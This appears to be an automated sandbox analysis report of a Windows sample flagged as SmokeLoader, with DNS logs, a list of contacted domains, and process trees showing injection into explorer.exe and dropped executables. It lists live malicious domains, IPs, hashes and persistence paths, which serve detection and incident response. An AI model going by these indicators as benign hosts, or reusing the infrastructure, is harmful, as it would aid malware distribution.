Jan 13, 2022 20:50:21.528119087 CET	8.8.8.8	192.168.2.5	0x5049	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:22.031879902 CET	8.8.8.8	192.168.2.5	0x561d	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:22.578578949 CET	8.8.8.8	192.168.2.5	0x87be	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:23.333172083 CET	8.8.8.8	192.168.2.5	0x60cc	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:23.913242102 CET	8.8.8.8	192.168.2.5	0x1fba	No error (0)	privacy-tools-for-you-780.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.213608027 CET	8.8.8.8	192.168.2.5	0xba95	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.405731916 CET	8.8.8.8	192.168.2.5	0x88f3	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.652326107 CET	8.8.8.8	192.168.2.5	0x8aa	No error (0)	unicupload.top		54.38.220.85	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.727003098 CET	8.8.8.8	192.168.2.5	0xe57a	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:27.944425106 CET	8.8.8.8	192.168.2.5	0x407f	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.157407045 CET	8.8.8.8	192.168.2.5	0x2822	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.389689922 CET	8.8.8.8	192.168.2.5	0xd5c8	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:28.585131884 CET	8.8.8.8	192.168.2.5	0xf69b	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.579428911 CET	8.8.8.8	192.168.2.5	0xdbc5	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.777633905 CET	8.8.8.8	192.168.2.5	0x3417	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:31.980295897 CET	8.8.8.8	192.168.2.5	0xde5c	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:32.195322990 CET	8.8.8.8	192.168.2.5	0xb0e	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:34.620995045 CET	8.8.8.8	192.168.2.5	0x2046	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:34.829580069 CET	8.8.8.8	192.168.2.5	0x8348	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.114659071 CET	8.8.8.8	192.168.2.5	0xac98	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.356386900 CET	8.8.8.8	192.168.2.5	0xcf3	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.356386900 CET	8.8.8.8	192.168.2.5	0xcf3	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.356386900 CET	8.8.8.8	192.168.2.5	0xcf3	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.356386900 CET	8.8.8.8	192.168.2.5	0xcf3	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:35.356386900 CET	8.8.8.8	192.168.2.5	0xcf3	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.159130096 CET	8.8.8.8	192.168.2.5	0xd895	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.352848053 CET	8.8.8.8	192.168.2.5	0xcd87	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:37.567598104 CET	8.8.8.8	192.168.2.5	0x69e3	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.104259014 CET	8.8.8.8	192.168.2.5	0x2d8f	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.104259014 CET	8.8.8.8	192.168.2.5	0x2d8f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.0	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.104259014 CET	8.8.8.8	192.168.2.5	0x2d8f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.104259014 CET	8.8.8.8	192.168.2.5	0x2d8f	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:54.104259014 CET	8.8.8.8	192.168.2.5	0x2d8f	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:56.640268087 CET	8.8.8.8	192.168.2.5	0x3455	No error (0)	patmushta.info		194.147.84.248	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.240576982 CET	8.8.8.8	192.168.2.5	0xb09d	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.462568998 CET	8.8.8.8	192.168.2.5	0x552	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.711718082 CET	8.8.8.8	192.168.2.5	0xc02b	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:50:59.917193890 CET	8.8.8.8	192.168.2.5	0x7c6e	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:00.127841949 CET	8.8.8.8	192.168.2.5	0x89a6	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:01.473987103 CET	8.8.8.8	192.168.2.5	0xf67f	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:02.854114056 CET	8.8.8.8	192.168.2.5	0x1521	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.077233076 CET	8.8.8.8	192.168.2.5	0x419	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.299500942 CET	8.8.8.8	192.168.2.5	0xe98	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.521477938 CET	8.8.8.8	192.168.2.5	0xc12	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:03.733238935 CET	8.8.8.8	192.168.2.5	0xd038	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:04.255460978 CET	8.8.8.8	192.168.2.5	0x8f25	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:04.479167938 CET	8.8.8.8	192.168.2.5	0xace9	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:04.675826073 CET	8.8.8.8	192.168.2.5	0x92b4	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.068919897 CET	8.8.8.8	192.168.2.5	0xed9	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.274704933 CET	8.8.8.8	192.168.2.5	0x3059	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.521966934 CET	8.8.8.8	192.168.2.5	0x69ab	No error (0)	goo.su		104.21.38.221	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:10.521966934 CET	8.8.8.8	192.168.2.5	0x69ab	No error (0)	goo.su		172.67.139.105	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.536814928 CET	8.8.8.8	192.168.2.5	0xd592	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.735837936 CET	8.8.8.8	192.168.2.5	0x5e38	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:11.904275894 CET	8.8.8.8	192.168.2.5	0xcf9b	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.199425936 CET	8.8.8.8	192.168.2.5	0xc75c	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.429064035 CET	8.8.8.8	192.168.2.5	0xf592	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:12.892231941 CET	8.8.8.8	192.168.2.5	0xd851	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:13.118015051 CET	8.8.8.8	192.168.2.5	0x380a	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.369241953 CET	8.8.8.8	192.168.2.5	0x850e	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.577545881 CET	8.8.8.8	192.168.2.5	0x82bc	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:17.825061083 CET	8.8.8.8	192.168.2.5	0x76d1	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:21.847376108 CET	8.8.8.8	192.168.2.5	0x97ec	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:22.140321970 CET	8.8.8.8	192.168.2.5	0x4f71	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:22.698045015 CET	8.8.8.8	192.168.2.5	0x21c0	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:23.031286001 CET	8.8.8.8	192.168.2.5	0x3bcd	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.175137997 CET	8.8.8.8	192.168.2.5	0x82c7	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.498091936 CET	8.8.8.8	192.168.2.5	0xf177	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.692013979 CET	8.8.8.8	192.168.2.5	0xa949	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:24.891491890 CET	8.8.8.8	192.168.2.5	0x5da8	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.090441942 CET	8.8.8.8	192.168.2.5	0x5f8c	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.284733057 CET	8.8.8.8	192.168.2.5	0x72f6	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.480112076 CET	8.8.8.8	192.168.2.5	0xad22	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.540070057 CET	8.8.8.8	192.168.2.5	0x59eb	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.683645010 CET	8.8.8.8	192.168.2.5	0x2c80	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.888603926 CET	8.8.8.8	192.168.2.5	0x3812	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:25.939457893 CET	8.8.8.8	192.168.2.5	0xf11	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:28.658353090 CET	8.8.8.8	192.168.2.5	0x23bb	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.429544926 CET	8.8.8.8	192.168.2.5	0xfb88	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.689757109 CET	8.8.8.8	192.168.2.5	0xdb83	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:29.940614939 CET	8.8.8.8	192.168.2.5	0xc153	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.048644066 CET	8.8.8.8	192.168.2.5	0x9964	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.048644066 CET	8.8.8.8	192.168.2.5	0x9964	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.048644066 CET	8.8.8.8	192.168.2.5	0x9964	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.048644066 CET	8.8.8.8	192.168.2.5	0x9964	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:31.048644066 CET	8.8.8.8	192.168.2.5	0x9964	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:33.104171038 CET	8.8.8.8	192.168.2.5	0xe25a	No error (0)	a0621298.xsph.ru		141.8.194.74	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:39.223459959 CET	8.8.8.8	192.168.2.5	0x60e	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:39.470139027 CET	8.8.8.8	192.168.2.5	0xb836	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:40.018325090 CET	8.8.8.8	192.168.2.5	0xa8ef	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:43.627818108 CET	8.8.8.8	192.168.2.5	0x7de9	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:43.888562918 CET	8.8.8.8	192.168.2.5	0xffbd	No error (0)	host-data-coin-11.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:44.195440054 CET	8.8.8.8	192.168.2.5	0x5096	No error (0)	data-host-coin-8.com		45.135.233.182	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:47.260868073 CET	8.8.8.8	192.168.2.5	0x9c6c	No error (0)	patmushta.info		194.147.84.248	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.442142963 CET	8.8.8.8	192.168.2.5	0xd24b	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.442142963 CET	8.8.8.8	192.168.2.5	0xd24b	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.54.36	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.442142963 CET	8.8.8.8	192.168.2.5	0xd24b	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.442142963 CET	8.8.8.8	192.168.2.5	0xd24b	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.0	A (IP address)	IN (0x0001)
Jan 13, 2022 20:51:51.442142963 CET	8.8.8.8	192.168.2.5	0xd24b	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

hudnwo.net

host-data-coin-11.com

imfaq.com

jjxcvqdtu.com

fbpbiuf.net

ubqgnsref.net

dencntiwom.org

facsdjlrhe.org

nbopqwwil.org

data-host-coin-8.com

bksuhny.net

ncekou.com

mlrqq.org

mkylelnvhx.org

privacy-tools-for-you-780.com

uasbnlg.com

djtirwiie.net

unicupload.top

ruexdakex.net

obxaeg.net

ocenwxcoy.net

cbnhk.net

qqkskcahhd.com

crthr.com

kjtyikafjr.org

gcluxyujw.net

185.7.214.171:8080

bsyjr.com

uvbrfosd.org

phljuvuic.com

mtege.com

hsqeovy.org

ffohm.org

uwxadets.net

owkwjgjx.org

ujflcd.org

wwwrwr.net

rffjdwq.org

hwjxdg.com

hrknr.net

ffqdri.net

rsnegictry.org

jeltu.com

kdpxgri.net

fisxwlhs.org

hfldhq.org

ontfrhif.com

bbrscm.org

rsccxqyvj.org

jhmgibx.org

xcyxdpo.com

bmitrqru.com

yomhbwinpp.net

jowhwjm.org

pedgrinq.com

a0621298.xsph.ru

pfdipnd.com

bhcnfrdygt.net

lepwe.net

wlbpl.net

ebglpbq.net

ldoxvunj.com

arxpt.com

wajww.org

bitqeg.net

rqhabfnn.net

hjilsxiyi.com

lvexyr.org

rfqgywpmj.net

nkjumxwsc.org

wnfuahwrra.com

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: emPJndhuvA.exe PID: 3352 Parent PID: 5996

General

Start time:	20:49:29
Start date:	13/01/2022
Path:	C:\Users\user\Desktop\emPJndhuvA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\emPJndhuvA.exe"
Imagebase:	0x400000
File size:	283648 bytes
MD5 hash:	A7444553F8A8FE2702B6FD48008D6605
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: emPJndhuvA.exe PID: 4160 Parent PID: 3352

General

Start time:	20:49:32
Start date:	13/01/2022
Path:	C:\Users\user\Desktop\emPJndhuvA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\emPJndhuvA.exe"
Imagebase:	0x400000
File size:	283648 bytes
MD5 hash:	A7444553F8A8FE2702B6FD48008D6605
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.310069625.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.309813053.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: svchost.exe PID: 4372 Parent PID: 556

General

Start time:	20:49:38
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: explorer.exe PID: 3472 Parent PID: 4160

General

Start time:	20:49:39
Start date:	13/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.295057363.0000000003A61000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: svchost.exe PID: 4596 Parent PID: 556

General

Start time:	20:49:48
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 4400 Parent PID: 556

General

Start time:	20:49:48
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 5784 Parent PID: 556

General

Start time:	20:49:49
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 5400 Parent PID: 556

General

Start time:	20:49:50
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 5056 Parent PID: 556

General

Start time:	20:49:50
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: SgrmBroker.exe PID: 2872 Parent PID: 556

General

Start time:	20:49:51
Start date:	13/01/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7d4480000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 5796 Parent PID: 556

General

Start time:	20:49:52
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 3540 Parent PID: 556

General

Start time:	20:49:53
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 1280 Parent PID: 556

General

Start time:	20:50:07
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tiftjuh PID: 4892 Parent PID: 904

General

Start time:	20:50:16
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\tiftjuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tiftjuh
Imagebase:	0x400000
File size:	283648 bytes
MD5 hash:	A7444553F8A8FE2702B6FD48008D6605
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs

Analysis Process: tiftjuh PID: 5816 Parent PID: 4892

General

Start time:	20:50:18
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Roaming\tiftjuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tiftjuh
Imagebase:	0x400000
File size:	283648 bytes
MD5 hash:	A7444553F8A8FE2702B6FD48008D6605
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.360645909.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.360518485.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: 2819.exe PID: 3104 Parent PID: 3472

General

Start time:	20:50:20
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\2819.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2819.exe
Imagebase:	0x400000
File size:	301056 bytes
MD5 hash:	277680BD3182EB0940BC356FF4712BEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, Metadefender, Browse Detection: 77%, ReversingLabs

Analysis Process: svchost.exe PID: 5208 Parent PID: 556

General

Start time:	20:50:25
Start date:	13/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: 3D67.exe PID: 5276 Parent PID: 3472

General

Start time:	20:50:25
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\3D67.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3D67.exe
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	BB0BA8D31F37E6B9F683EBD9044F1A85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: WerFault.exe PID: 5736 Parent PID: 5208

General

Start time:	20:50:26
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104
Imagebase:	0x1e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WerFault.exe PID: 5956 Parent PID: 3104

General

Start time:	20:50:28
Start date:	13/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 540
Imagebase:	0x1e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: 3D67.exe PID: 4968 Parent PID: 5276

General

Start time:	20:50:29
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\3D67.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3D67.exe
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	BB0BA8D31F37E6B9F683EBD9044F1A85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.386280466.0000000001F30000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.386498287.0000000002431000.00000004.00020000.sdmp, Author: Joe Security

Analysis Process: FD2B.exe PID: 468 Parent PID: 3472

General

Start time:	20:50:30
Start date:	13/01/2022
Path:	C:\Users\user\AppData\Local\Temp\FD2B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\FD2B.exe
Imagebase:	0x400000
File size:	327168 bytes
MD5 hash:	CEBAF005081C730D4AC7A87E46B440D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
